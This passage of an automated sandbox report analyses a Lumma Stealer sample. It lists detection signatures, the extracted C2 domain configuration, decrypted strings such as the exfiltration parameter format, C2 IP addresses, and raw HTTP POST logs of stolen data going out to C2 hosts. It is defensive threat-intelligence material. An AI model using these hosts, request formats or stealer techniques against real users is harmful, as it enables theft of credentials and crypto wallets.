Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ardware-v1.exe

Overview

General Information

Sample name:ardware-v1.exe
Analysis ID:1577233
MD5:c491ddba2ee7516cfc5d5b57ece509a2
SHA1:c0d068660dd74e890bf653a5c839e32314f6bca3
SHA256:1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
Tags:exeuser-smica83
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ardware-v1.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\ardware-v1.exe" MD5: C491DDBA2EE7516CFC5D5B57ECE509A2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["immureprech.biz", "spend-shiny.cyou", "awake-weaves.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz", "debonairnukk.xyz", "deafeninggeh.biz", "effecterectz.xyz", "sordid-snaked.cyou"], "Build id": "tfL8re--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 14 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:37.556615+010020283713Unknown Traffic192.168.2.849712178.62.201.34443TCP
                2024-12-18T09:58:41.328110+010020283713Unknown Traffic192.168.2.84971345.77.249.79443TCP
                2024-12-18T09:58:45.603019+010020283713Unknown Traffic192.168.2.84971423.55.153.106443TCP
                2024-12-18T09:58:47.956560+010020283713Unknown Traffic192.168.2.849715104.21.66.86443TCP
                2024-12-18T09:58:50.485048+010020283713Unknown Traffic192.168.2.849716104.21.66.86443TCP
                2024-12-18T09:58:53.515162+010020283713Unknown Traffic192.168.2.849717104.21.66.86443TCP
                2024-12-18T09:58:55.867927+010020283713Unknown Traffic192.168.2.849718104.21.66.86443TCP
                2024-12-18T09:58:59.279633+010020283713Unknown Traffic192.168.2.849719104.21.66.86443TCP
                2024-12-18T09:59:02.733201+010020283713Unknown Traffic192.168.2.849720104.21.66.86443TCP
                2024-12-18T09:59:05.287293+010020283713Unknown Traffic192.168.2.849721104.21.66.86443TCP
                2024-12-18T09:59:09.101015+010020283713Unknown Traffic192.168.2.849722104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:38.131521+010020546531A Network Trojan was detected192.168.2.849712178.62.201.34443TCP
                2024-12-18T09:58:42.516776+010020546531A Network Trojan was detected192.168.2.84971345.77.249.79443TCP
                2024-12-18T09:58:49.061153+010020546531A Network Trojan was detected192.168.2.849715104.21.66.86443TCP
                2024-12-18T09:58:51.308205+010020546531A Network Trojan was detected192.168.2.849716104.21.66.86443TCP
                2024-12-18T09:59:09.910836+010020546531A Network Trojan was detected192.168.2.849722104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:38.131521+010020498361A Network Trojan was detected192.168.2.849712178.62.201.34443TCP
                2024-12-18T09:58:42.516776+010020498361A Network Trojan was detected192.168.2.84971345.77.249.79443TCP
                2024-12-18T09:58:49.061153+010020498361A Network Trojan was detected192.168.2.849715104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:51.308205+010020498121A Network Trojan was detected192.168.2.849716104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:41.328110+010020582151Domain Observed Used for C2 Detected192.168.2.84971345.77.249.79443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:37.556615+010020582231Domain Observed Used for C2 Detected192.168.2.849712178.62.201.34443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:43.610498+010020582101Domain Observed Used for C2 Detected192.168.2.8582991.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:38.138129+010020582141Domain Observed Used for C2 Detected192.168.2.8545761.1.1.153UDP
                2024-12-18T09:58:39.135253+010020582141Domain Observed Used for C2 Detected192.168.2.8545761.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:43.075720+010020582161Domain Observed Used for C2 Detected192.168.2.8585571.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:42.847703+010020582181Domain Observed Used for C2 Detected192.168.2.8529221.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:42.536331+010020582201Domain Observed Used for C2 Detected192.168.2.8653251.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:34.461277+010020582221Domain Observed Used for C2 Detected192.168.2.8527951.1.1.153UDP
                2024-12-18T09:58:35.448316+010020582221Domain Observed Used for C2 Detected192.168.2.8527951.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:43.846754+010020582261Domain Observed Used for C2 Detected192.168.2.8592961.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:43.381328+010020582361Domain Observed Used for C2 Detected192.168.2.8562841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:57.737935+010020480941Malware Command and Control Activity Detected192.168.2.849718104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:37.558557+010028225211Domain Observed Used for C2 Detected178.62.201.34443192.168.2.849712TCP
                2024-12-18T09:58:41.432096+010028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.849713TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:58:46.363652+010028586661Domain Observed Used for C2 Detected192.168.2.84971423.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://sordid-snaked.cyou/api7Avira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz/apieAvira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz/P:Avira URL Cloud: Label: malware
                Source: https://awake-weaves.cyou/api8Avira URL Cloud: Label: malware
                Source: https://spend-shiny.cyou:443/apiAvira URL Cloud: Label: malware
                Source: https://awake-weaves.cyou/apiLAvira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz:443/api1Avira URL Cloud: Label: malware
                Source: spend-shiny.cyouAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.2.ardware-v1.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "spend-shiny.cyou", "awake-weaves.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz", "debonairnukk.xyz", "deafeninggeh.biz", "effecterectz.xyz", "sordid-snaked.cyou"], "Build id": "tfL8re--"}
                Multi AV Scanner detection for submitted file
                Source: ardware-v1.exeVirustotal: Detection: 20%Perma Link
                Source: ardware-v1.exeReversingLabs: Detection: 23%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.2% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: sordid-snaked.cyou
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: awake-weaves.cyou
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: wrathful-jammy.cyou
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: debonairnukk.xyz
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: diffuculttan.xyz
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: effecterectz.xyz
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: deafeninggeh.biz
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: immureprech.biz
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: spend-shiny.cyou
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: - Screen Resoluton:
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: Workgroup: -
                Source: 0.2.ardware-v1.exe.400000.0.unpackString decryptor: tfL8re--
                Source: ardware-v1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ardware-v1.exeStatic PE information: certificate valid
                Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49722 version: TLS 1.2
                Source: ardware-v1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb source: ardware-v1.exe
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.8:65325 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.8:59296 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.8:49713 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.8:56284 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.8:49713
                Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.8:54576 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.8:49712 -> 178.62.201.34:443
                Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.8:58299 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.8:52795 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.8:52922 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.8:49712
                Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.8:58557 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49714 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49713 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49712 -> 178.62.201.34:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49712 -> 178.62.201.34:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49718 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49716 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49722 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: immureprech.biz
                Source: Malware configuration extractorURLs: spend-shiny.cyou
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Performs DNS queries to domains with low reputation
                Source: DNS query: effecterectz.xyz
                Source: DNS query: diffuculttan.xyz
                Source: DNS query: debonairnukk.xyz
                Source: Joe Sandbox ViewIP Address: 45.77.249.79 45.77.249.79
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewIP Address: 178.62.201.34 178.62.201.34
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 178.62.201.34:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0SYGSMFUW8EWPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12817Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PWR04A959User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15016Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TRK9XY1MPYD13User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20207Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CY2NMLA0BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1163Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T20P8D76V41ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 590968Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $LDstly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https: equals www.youtube.com (Youtube)
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: //*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr@ equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: spend-shiny.cyou
                Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: ardware-v1.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                Source: ardware-v1.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
